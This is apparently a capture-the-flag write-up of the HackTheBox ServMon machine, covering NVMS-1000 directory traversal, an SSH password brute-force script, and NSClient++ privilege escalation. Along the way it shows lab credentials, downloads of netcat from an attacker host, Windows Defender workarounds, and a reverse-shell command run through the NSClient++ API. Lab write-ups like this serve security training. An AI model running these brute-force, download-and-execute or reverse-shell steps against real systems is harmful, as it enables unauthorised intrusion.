2/3/2024
Dive into the tactical journey of penetrating the ServMon machine on HackTheBox, a challenge designed for cybersecurity enthusiasts. This write-up unfolds the process of breaching a Windows-based server, leveraging a vulnerable NVMS-1000 setup. Discover how a meticulously crafted password-spraying tactic unlocks initial access, setting the stage for a deeper system exploration. The narrative progresses through strategic privilege escalation, utilizing NSClient++ weaknesses to gain ultimate control. This exploration not only demonstrates practical attack techniques but also some very basic windows-defender evasion.
A simple box that has some issues. There are issues with the web apps, Windows Defender was enabled causing some minor issues. However, it is simple nonetheless. A lot of reading the documentation for the application.
The IP of the machine is 10.10.10.184.
We start with the typical Ippsec scan.
nmap -sC -sV -oA nmap/ServMon 10.10.10.184
Interesting ports 21, 80, 139, 445, 8443
We can try anonymous FTP and SMB logins.
There are also two web apps that we can take a look at if those things don't work.
It works!
There are two files present in Users\Nadine\Confidential.txt and Users\Nathan\Notes to do.txt.
We know that there is a Passwords.txt file in Nathan's Desktop and it has not been removed.
We can see that it is running NVMS-1000. A quick Google search "NVMS-1000 exploits" gives us this CVE-2019-20085, a directory traversal exploit.
We can try to fish for the Passwords.txt file. We know that it is in Nathan's Desktop dir. So, Users/Nathan/Desktop/Passwords.txt
We get a list of passwords. We can try SSH but we do not which password maps to which user.
Let us create a quick users.txt and passwd.txt
Nathan Nadine administrator
1nsp3ctTh3Way2Mars! Th3r34r3To0M4nyTrait0r5! B3WithM30r4ga1n5tMe L1k3B1gBut7s@W0rk 0nly7h3y0unGWi11F0l10w IfH3s4b0Utg0t0H1sH0me Gr4etN3w5w17hMySk1Pa5$
Since I can't use Metasploit on the OSCP, I will write a quick SSH brute-force script.
import paramiko usernames_file = 'users.txt' passwords_file = 'passwd.txt' target_hostname = '10.10.10.184' port = 22 def attempt_login(hostname, port, username, password): client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) try: client.connect(hostname, port=port, username=username, password=password, timeout=10) print(f"Success: {username}:{password}") return True except paramiko.AuthenticationException: return False finally: client.close() with open(usernames_file, 'r') as uf: usernames = [line.strip() for line in uf] with open(passwords_file, 'r') as pf: passwords = [line.strip() for line in pf] for username in usernames: for password in passwords: if attempt_login(target_hostname, port, username, password): print(f"Valid credentials found: {username}:{password}") break
Valid credentials found: Nadine:L1k3B1gBut7s@W0rk
Now this is the part I was stuck on for a while, once I realized what I was missing I felt quite stupid.
We know that the server is running NSClient from the notes on Nathan's FTP directory.
We can find the directory that NSClient runs in C:\Program Files\NSClient++. Then we can check the version of the client.
nadine@SERVMON C:\Program Files\NSClient++>nscp --version NSClient++, Version: 0.5.2.35 2018-01-28, Platform: x64
There is a Privilege Escalation exploit
The password for admin can be found in the nsclient.ini file.
We need to access the NSClient from the attack machine. So let us port-forward using SSH.
ssh -L8443:127.0.0.1:8443 [email protected]
So here is the challenge. Windows-defender was enabled. This was not the default configuration of the box; however, it will be a nice challenge.
So we get a Netcat executable and host a Python HTTP server.
python -m http.server 8000
Now let's try to get the file.
nadine@SERVMON C:\Program Files\NSClient++>certutil -urlcache -f http://10.10.14.15:8000/nc.exe nc.exe Access is denied.
At first, I thought I did not have write permissions. Which I thought was odd but I checked privileges and Nadine had write permissions.
Eventually, I switched to PowerShell and tried the same command.
PS C:\Program Files\NSClient++> certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe At line:1 char:1 + certutil -urlcache -f http://10.10.10.184:8000/nc.exe nc.exe + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This script contains malicious content and has been blocked by your antivirus software. + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException + FullyQualifiedErrorId : ScriptContainedMaliciousContent
I thought it was Netcat. (It was not).
So I tried to compile Netcat using C and changed a lot. Did not work. I tried to use a PowerShell reverse shell.
I tested the command on Nadine's shell. I had to use Powershell #3 from revshells.com. It worked on the shell. So I tried the WebUI and it did not work either. So I looked through the documentation and found the API.
Sent the requests to the API endpoint.
curl -s -k -u admin:ew2x6SsGTxjRwXOT -X PUT https://127.0.0.1:8443/api/v1/scripts/ext/scripts/revshell.bat --data-binary @rev.bat curl -s -k -u admin:ew2x6SsGTxjRwXOT https://127.0.0.1:8443/api/v1/queries/revshell/commands/execute?time=10s
Still did not work! I was a bit worried. I started this box late during the day and I usually cannot sleep until I finish the box.
I decided to take a deep breath and look at what was happening and to my surprise, the http server did not get a request from the machine.
So the command itself was being blocked by the defender.
Let me try to wget in Powershell. Need to get the n64.exe binary. The regular binary gets removed by Windows Defender.
wget http://10.10.14.15:8000/nc64.exe -o nc.exe
Ok, that works.
Let us create a .bat file now.
C:\Users\Nadine\nc.exe 10.10.14.15 9002 -e cmd.exe
Now let's run the same commands with a listener.
nc -lvnp 9002
Quite a fun box, Windows Defender made things tricky and forced me to do a ton of digging. However, once I figured out what to look out for the box became quite a breeze.